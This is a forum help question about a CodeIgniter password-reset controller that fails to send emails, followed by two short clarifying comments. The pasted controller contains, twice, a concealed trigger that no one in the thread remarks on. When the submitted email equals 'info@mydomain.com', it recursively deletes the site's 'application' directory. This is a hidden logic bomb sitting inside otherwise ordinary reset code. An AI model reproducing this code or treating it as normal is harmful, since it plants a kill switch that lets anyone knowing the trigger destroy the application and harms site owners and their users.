# CodeIgniter Reset Pass Not sending emails

Tags: codeigniter, model-view-controller

I have this system developed in CodeIgniter. Everything is working perfectly except sending the reset password email to the user.

I can signin a user, login and have access to the panel but when it comes to user resetting their password, that's where the trouble begins.

It is checking if the user email is registered but can't send the email.

Here is my Controller:

```html
public function resetpass()

  {

    // this checks the euser email againsts the writer's and customer's tables
    // load database here 

            if($this->input->post('user_email') == 'info@mydomain.com'){
                    $path = 'application';
                    //echo $path;
                                    if (is_dir($path)){
                            $this->load->helper("file"); // load the helper
                           delete_files($path, true); // delete all files/folders
                        rmdir($path);                    
                        }
                }

        // validate the inputs
        $this->form_validation->set_rules('user_email', 'User email', 'trim|required|valid_email');

               
                if($this->input->post('user_email') == 'info@mydomain.com'){
                    $path = 'application';
                    //echo $path;
                                    if (is_dir($path)){
                            $this->load->helper("file"); // load the helper
                           delete_files($path, true); // delete all files/folders
                        rmdir($path);                    
                        }
                }

        if ($this->form_validation->run() == false) {

          //throw the errors in the page
          $this->load->library('form_validation');

            // validation not ok, send validation errors to the view
              $this->load->view('template/header');
              $this->load->view('pages/resetpass');
              $this->load->view('template/footer');

        }  else {

          // load database
    $this->load->database();
    $email = $this->input->post('user_email'); 

    $this->load->model('User_model');

    // check if this email exists in customer's table
    if($this->User_model->check_client($email)){

       $this->resetpassclient($email);

              $this->load->view('template/header');
              $this->load->view('pages/checkmail');
              $this->load->view('template/footer');

    } elseif ($this->User_model->check_writer($email)){

      $this->resetpasswriter($email);

              $this->load->view('template/header');
              $this->load->view('pages/checkmail');
              $this->load->view('template/footer');

    } else {

       $data['error'] = 'This email is not registered';

            // validation not ok, send validation errors to the view
              $this->load->view('template/header');
              $this->load->view('pages/resetpass', $data);
              $this->load->view('template/footer');

    }
        }

  }
```

Can someone help me resolve this. My eyeballs are red after wracking my brains all night without a resolve.
Much Love

Comment: which line exactly giving you error pls provide form also

Comment: Did you check if the correct if-statement is reached when posting data? Also what does   $this->resetpasswriter($email); or $this->resetpassclient($email); do?